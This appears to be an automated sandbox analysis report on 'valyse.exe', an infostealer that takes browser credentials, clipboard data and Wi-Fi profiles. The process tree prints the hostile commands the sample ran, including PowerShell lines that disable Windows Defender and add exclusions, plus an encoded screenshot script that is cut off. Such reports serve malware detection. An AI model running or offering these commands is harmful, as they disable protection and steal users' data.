f3cd49ce77c8ff1839d895b482150f3f7f165d20e1618de9dbd176b64b8042dc

Analysis

max time kernel
95s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
08-12-2024 14:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

valyse.exe
Size

6.9MB
MD5

ad8f8e7bde991f5fac2c6d317cf3df3d
SHA1

9617e755532167c5c7d11c7a26da306fa9ed3659
SHA256

f3cd49ce77c8ff1839d895b482150f3f7f165d20e1618de9dbd176b64b8042dc
SHA512

c08f655a7913313bcdd06ebcb32aeff209dfa444e0fa474b6611b028c79f49066269a9c59c8dc43efe21013b90d579662abcc033bfd70d61e9e65e68af34a449
SSDEEP

98304:7ADjWM8JEE1FrCKamaHl3Ne4i3Tf2PkOpfW9hZMMoVmkzhxIdfXeRpYRJJcGhEIU:7A0geNTfm/pf+xk4dWRpmrbW3jmr2

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3888	powershell.exe
1728	powershell.exe
452	powershell.exe
4808	powershell.exe
3088	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	valyse.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
4884	cmd.exe
2836	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
4712	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
3620	valyse.exe
3620	valyse.exe
3620	valyse.exe
3620	valyse.exe
3620	valyse.exe
3620	valyse.exe
3620	valyse.exe
3620	valyse.exe
3620	valyse.exe
3620	valyse.exe
3620	valyse.exe
3620	valyse.exe
3620	valyse.exe
3620	valyse.exe
3620	valyse.exe
3620	valyse.exe
3620	valyse.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
26	discord.com
27	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
15	ip-api.com
24	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
4860	tasklist.exe
1820	tasklist.exe
1376	tasklist.exe
452	tasklist.exe
4296	tasklist.exe

UPX packed file 61 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000023c98-21.dat	upx
behavioral2/memory/3620-25-0x00007FFC9E9E0000-0x00007FFC9EFC8000-memory.dmp	upx
behavioral2/files/0x0007000000023c8b-28.dat	upx
behavioral2/files/0x0007000000023c96-29.dat	upx
behavioral2/memory/3620-48-0x00007FFCB6C30000-0x00007FFCB6C3F000-memory.dmp	upx
behavioral2/files/0x0007000000023c92-47.dat	upx
behavioral2/files/0x0007000000023c91-46.dat	upx
behavioral2/files/0x0007000000023c90-45.dat	upx
behavioral2/files/0x0007000000023c8f-44.dat	upx
behavioral2/files/0x0007000000023c8e-43.dat	upx
behavioral2/files/0x0007000000023c8d-42.dat	upx
behavioral2/files/0x0007000000023c8c-41.dat	upx
behavioral2/files/0x0007000000023c8a-40.dat	upx
behavioral2/files/0x0007000000023c9d-39.dat	upx
behavioral2/files/0x0007000000023c9c-38.dat	upx
behavioral2/files/0x0007000000023c9b-37.dat	upx
behavioral2/files/0x0007000000023c97-34.dat	upx
behavioral2/files/0x0007000000023c95-33.dat	upx
behavioral2/memory/3620-31-0x00007FFCB1C90000-0x00007FFCB1CB4000-memory.dmp	upx
behavioral2/memory/3620-54-0x00007FFCAE630000-0x00007FFCAE65D000-memory.dmp	upx
behavioral2/memory/3620-56-0x00007FFCB42A0000-0x00007FFCB42B9000-memory.dmp	upx
behavioral2/memory/3620-58-0x00007FFCAE600000-0x00007FFCAE623000-memory.dmp	upx
behavioral2/memory/3620-60-0x00007FFC9E860000-0x00007FFC9E9D3000-memory.dmp	upx
behavioral2/memory/3620-62-0x00007FFCAE520000-0x00007FFCAE539000-memory.dmp	upx
behavioral2/memory/3620-64-0x00007FFCB1B50000-0x00007FFCB1B5D000-memory.dmp	upx
behavioral2/memory/3620-66-0x00007FFCAE4F0000-0x00007FFCAE51E000-memory.dmp	upx
behavioral2/memory/3620-70-0x00007FFC9E9E0000-0x00007FFC9EFC8000-memory.dmp	upx
behavioral2/memory/3620-72-0x00007FFCA63A0000-0x00007FFCA6458000-memory.dmp	upx
behavioral2/memory/3620-71-0x00007FFCB1C90000-0x00007FFCB1CB4000-memory.dmp	upx
behavioral2/memory/3620-74-0x00007FFC9DDC0000-0x00007FFC9E135000-memory.dmp	upx
behavioral2/memory/3620-76-0x00007FFCAE4D0000-0x00007FFCAE4E4000-memory.dmp	upx
behavioral2/memory/3620-79-0x00007FFCAE710000-0x00007FFCAE71D000-memory.dmp	upx
behavioral2/memory/3620-78-0x00007FFCAE630000-0x00007FFCAE65D000-memory.dmp	upx
behavioral2/memory/3620-82-0x00007FFC9DCA0000-0x00007FFC9DDBC000-memory.dmp	upx
behavioral2/memory/3620-81-0x00007FFCB42A0000-0x00007FFCB42B9000-memory.dmp	upx
behavioral2/memory/3620-108-0x00007FFCAE600000-0x00007FFCAE623000-memory.dmp	upx
behavioral2/memory/3620-111-0x00007FFC9E860000-0x00007FFC9E9D3000-memory.dmp	upx
behavioral2/memory/3620-170-0x00007FFCAE520000-0x00007FFCAE539000-memory.dmp	upx
behavioral2/memory/3620-214-0x00007FFCB1B50000-0x00007FFCB1B5D000-memory.dmp	upx
behavioral2/memory/3620-266-0x00007FFCAE4F0000-0x00007FFCAE51E000-memory.dmp	upx
behavioral2/memory/3620-268-0x00007FFCA63A0000-0x00007FFCA6458000-memory.dmp	upx
behavioral2/memory/3620-284-0x00007FFC9DDC0000-0x00007FFC9E135000-memory.dmp	upx
behavioral2/memory/3620-297-0x00007FFCB1C90000-0x00007FFCB1CB4000-memory.dmp	upx
behavioral2/memory/3620-296-0x00007FFC9E9E0000-0x00007FFC9EFC8000-memory.dmp	upx
behavioral2/memory/3620-302-0x00007FFC9E860000-0x00007FFC9E9D3000-memory.dmp	upx
behavioral2/memory/3620-321-0x00007FFC9E9E0000-0x00007FFC9EFC8000-memory.dmp	upx
behavioral2/memory/3620-336-0x00007FFC9E9E0000-0x00007FFC9EFC8000-memory.dmp	upx
behavioral2/memory/3620-356-0x00007FFCAE600000-0x00007FFCAE623000-memory.dmp	upx
behavioral2/memory/3620-364-0x00007FFC9DCA0000-0x00007FFC9DDBC000-memory.dmp	upx
behavioral2/memory/3620-363-0x00007FFCAE710000-0x00007FFCAE71D000-memory.dmp	upx
behavioral2/memory/3620-362-0x00007FFCAE4D0000-0x00007FFCAE4E4000-memory.dmp	upx
behavioral2/memory/3620-361-0x00007FFCA63A0000-0x00007FFCA6458000-memory.dmp	upx
behavioral2/memory/3620-360-0x00007FFCAE4F0000-0x00007FFCAE51E000-memory.dmp	upx
behavioral2/memory/3620-359-0x00007FFCB1B50000-0x00007FFCB1B5D000-memory.dmp	upx
behavioral2/memory/3620-358-0x00007FFCAE520000-0x00007FFCAE539000-memory.dmp	upx
behavioral2/memory/3620-357-0x00007FFC9E860000-0x00007FFC9E9D3000-memory.dmp	upx
behavioral2/memory/3620-355-0x00007FFCB42A0000-0x00007FFCB42B9000-memory.dmp	upx
behavioral2/memory/3620-354-0x00007FFCAE630000-0x00007FFCAE65D000-memory.dmp	upx
behavioral2/memory/3620-353-0x00007FFCB1C90000-0x00007FFCB1CB4000-memory.dmp	upx
behavioral2/memory/3620-352-0x00007FFCB6C30000-0x00007FFCB6C3F000-memory.dmp	upx
behavioral2/memory/3620-351-0x00007FFC9DDC0000-0x00007FFC9E135000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
2912	cmd.exe
1228	netsh.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2364	WMIC.exe
4988	WMIC.exe
1528	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
3220	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 21 IoCs

pid	Process
3088	powershell.exe
3888	powershell.exe
3088	powershell.exe
3888	powershell.exe
1728	powershell.exe
1728	powershell.exe
1728	powershell.exe
2836	powershell.exe
2836	powershell.exe
4632	powershell.exe
4632	powershell.exe
2836	powershell.exe
4632	powershell.exe
452	powershell.exe
452	powershell.exe
1648	powershell.exe
1648	powershell.exe
4808	powershell.exe
4808	powershell.exe
3840	powershell.exe
3840	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	3228	WMIC.exe
Token: SeSecurityPrivilege	3228	WMIC.exe
Token: SeTakeOwnershipPrivilege	3228	WMIC.exe
Token: SeLoadDriverPrivilege	3228	WMIC.exe
Token: SeSystemProfilePrivilege	3228	WMIC.exe
Token: SeSystemtimePrivilege	3228	WMIC.exe
Token: SeProfSingleProcessPrivilege	3228	WMIC.exe
Token: SeIncBasePriorityPrivilege	3228	WMIC.exe
Token: SeCreatePagefilePrivilege	3228	WMIC.exe
Token: SeBackupPrivilege	3228	WMIC.exe
Token: SeRestorePrivilege	3228	WMIC.exe
Token: SeShutdownPrivilege	3228	WMIC.exe
Token: SeDebugPrivilege	3228	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3228	WMIC.exe
Token: SeRemoteShutdownPrivilege	3228	WMIC.exe
Token: SeUndockPrivilege	3228	WMIC.exe
Token: SeManageVolumePrivilege	3228	WMIC.exe
Token: 33	3228	WMIC.exe
Token: 34	3228	WMIC.exe
Token: 35	3228	WMIC.exe
Token: 36	3228	WMIC.exe
Token: SeDebugPrivilege	452	tasklist.exe
Token: SeDebugPrivilege	3088	powershell.exe
Token: SeIncreaseQuotaPrivilege	3228	WMIC.exe
Token: SeSecurityPrivilege	3228	WMIC.exe
Token: SeTakeOwnershipPrivilege	3228	WMIC.exe
Token: SeLoadDriverPrivilege	3228	WMIC.exe
Token: SeSystemProfilePrivilege	3228	WMIC.exe
Token: SeSystemtimePrivilege	3228	WMIC.exe
Token: SeProfSingleProcessPrivilege	3228	WMIC.exe
Token: SeIncBasePriorityPrivilege	3228	WMIC.exe
Token: SeCreatePagefilePrivilege	3228	WMIC.exe
Token: SeBackupPrivilege	3228	WMIC.exe
Token: SeRestorePrivilege	3228	WMIC.exe
Token: SeShutdownPrivilege	3228	WMIC.exe
Token: SeDebugPrivilege	3228	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3228	WMIC.exe
Token: SeRemoteShutdownPrivilege	3228	WMIC.exe
Token: SeUndockPrivilege	3228	WMIC.exe
Token: SeManageVolumePrivilege	3228	WMIC.exe
Token: 33	3228	WMIC.exe
Token: 34	3228	WMIC.exe
Token: 35	3228	WMIC.exe
Token: 36	3228	WMIC.exe
Token: SeDebugPrivilege	3888	powershell.exe
Token: SeIncreaseQuotaPrivilege	2364	WMIC.exe
Token: SeSecurityPrivilege	2364	WMIC.exe
Token: SeTakeOwnershipPrivilege	2364	WMIC.exe
Token: SeLoadDriverPrivilege	2364	WMIC.exe
Token: SeSystemProfilePrivilege	2364	WMIC.exe
Token: SeSystemtimePrivilege	2364	WMIC.exe
Token: SeProfSingleProcessPrivilege	2364	WMIC.exe
Token: SeIncBasePriorityPrivilege	2364	WMIC.exe
Token: SeCreatePagefilePrivilege	2364	WMIC.exe
Token: SeBackupPrivilege	2364	WMIC.exe
Token: SeRestorePrivilege	2364	WMIC.exe
Token: SeShutdownPrivilege	2364	WMIC.exe
Token: SeDebugPrivilege	2364	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2364	WMIC.exe
Token: SeRemoteShutdownPrivilege	2364	WMIC.exe
Token: SeUndockPrivilege	2364	WMIC.exe
Token: SeManageVolumePrivilege	2364	WMIC.exe
Token: 33	2364	WMIC.exe
Token: 34	2364	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4164 wrote to memory of 3620	4164	valyse.exe	83
PID 4164 wrote to memory of 3620	4164	valyse.exe	83
PID 3620 wrote to memory of 3688	3620	valyse.exe	84
PID 3620 wrote to memory of 3688	3620	valyse.exe	84
PID 3620 wrote to memory of 1228	3620	valyse.exe	85
PID 3620 wrote to memory of 1228	3620	valyse.exe	85
PID 3620 wrote to memory of 1636	3620	valyse.exe	86
PID 3620 wrote to memory of 1636	3620	valyse.exe	86
PID 3620 wrote to memory of 2060	3620	valyse.exe	90
PID 3620 wrote to memory of 2060	3620	valyse.exe	90
PID 3620 wrote to memory of 968	3620	valyse.exe	92
PID 3620 wrote to memory of 968	3620	valyse.exe	92
PID 968 wrote to memory of 3228	968	cmd.exe	94
PID 968 wrote to memory of 3228	968	cmd.exe	94
PID 2060 wrote to memory of 452	2060	cmd.exe	95
PID 2060 wrote to memory of 452	2060	cmd.exe	95
PID 3688 wrote to memory of 3888	3688	cmd.exe	96
PID 3688 wrote to memory of 3888	3688	cmd.exe	96
PID 1228 wrote to memory of 3088	1228	cmd.exe	97
PID 1228 wrote to memory of 3088	1228	cmd.exe	97
PID 1636 wrote to memory of 2324	1636	cmd.exe	98
PID 1636 wrote to memory of 2324	1636	cmd.exe	98
PID 3620 wrote to memory of 1724	3620	valyse.exe	100
PID 3620 wrote to memory of 1724	3620	valyse.exe	100
PID 1724 wrote to memory of 2372	1724	cmd.exe	102
PID 1724 wrote to memory of 2372	1724	cmd.exe	102
PID 3620 wrote to memory of 1604	3620	valyse.exe	103
PID 3620 wrote to memory of 1604	3620	valyse.exe	103
PID 1604 wrote to memory of 1532	1604	cmd.exe	105
PID 1604 wrote to memory of 1532	1604	cmd.exe	105
PID 3620 wrote to memory of 2548	3620	valyse.exe	106
PID 3620 wrote to memory of 2548	3620	valyse.exe	106
PID 2548 wrote to memory of 2364	2548	cmd.exe	108
PID 2548 wrote to memory of 2364	2548	cmd.exe	108
PID 3620 wrote to memory of 3292	3620	valyse.exe	109
PID 3620 wrote to memory of 3292	3620	valyse.exe	109
PID 3292 wrote to memory of 4988	3292	cmd.exe	111
PID 3292 wrote to memory of 4988	3292	cmd.exe	111
PID 3620 wrote to memory of 4904	3620	valyse.exe	112
PID 3620 wrote to memory of 4904	3620	valyse.exe	112
PID 4904 wrote to memory of 1728	4904	cmd.exe	114
PID 4904 wrote to memory of 1728	4904	cmd.exe	114
PID 3620 wrote to memory of 2852	3620	valyse.exe	115
PID 3620 wrote to memory of 2852	3620	valyse.exe	115
PID 3620 wrote to memory of 3124	3620	valyse.exe	116
PID 3620 wrote to memory of 3124	3620	valyse.exe	116
PID 2852 wrote to memory of 4296	2852	cmd.exe	119
PID 2852 wrote to memory of 4296	2852	cmd.exe	119
PID 3124 wrote to memory of 4860	3124	cmd.exe	120
PID 3124 wrote to memory of 4860	3124	cmd.exe	120
PID 3620 wrote to memory of 4884	3620	valyse.exe	121
PID 3620 wrote to memory of 4884	3620	valyse.exe	121
PID 3620 wrote to memory of 4640	3620	valyse.exe	122
PID 3620 wrote to memory of 4640	3620	valyse.exe	122
PID 3620 wrote to memory of 4664	3620	valyse.exe	124
PID 3620 wrote to memory of 4664	3620	valyse.exe	124
PID 3620 wrote to memory of 3160	3620	valyse.exe	126
PID 3620 wrote to memory of 3160	3620	valyse.exe	126
PID 3620 wrote to memory of 2912	3620	valyse.exe	128
PID 3620 wrote to memory of 2912	3620	valyse.exe	128
PID 3620 wrote to memory of 1936	3620	valyse.exe	131
PID 3620 wrote to memory of 1936	3620	valyse.exe	131
PID 3620 wrote to memory of 3448	3620	valyse.exe	133
PID 3620 wrote to memory of 3448	3620	valyse.exe	133

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2488	attrib.exe
4568	attrib.exe

C:\Users\Admin\AppData\Local\Temp\valyse.exe
"C:\Users\Admin\AppData\Local\Temp\valyse.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4164
- C:\Users\Admin\AppData\Local\Temp\valyse.exe
  "C:\Users\Admin\AppData\Local\Temp\valyse.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:3620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\valyse.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3688
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\valyse.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3888
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1228
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3088
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('uspjesno ste dobili moju mindzulinu na 10 minuta, javite se u DM za vise informacija.', 0, 'biljana stajic cirovic', 32+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1636
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('uspjesno ste dobili moju mindzulinu na 10 minuta, javite se u DM za vise informacija.', 0, 'biljana stajic cirovic', 32+16);close()"
      4⤵
      PID:2324
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2060
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:452
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:968
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3228
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1724
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:2372
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1604
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:1532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2548
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:2364
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3292
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:4988
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏‏ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4904
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏‏ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1728
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2852
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4296
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3124
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4860
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:4884
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:2836
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:4640
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:4616
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:4664
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1820
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3160
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:212
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:2912
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:1228
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:1936
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:3220
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:3448
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:4060
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAH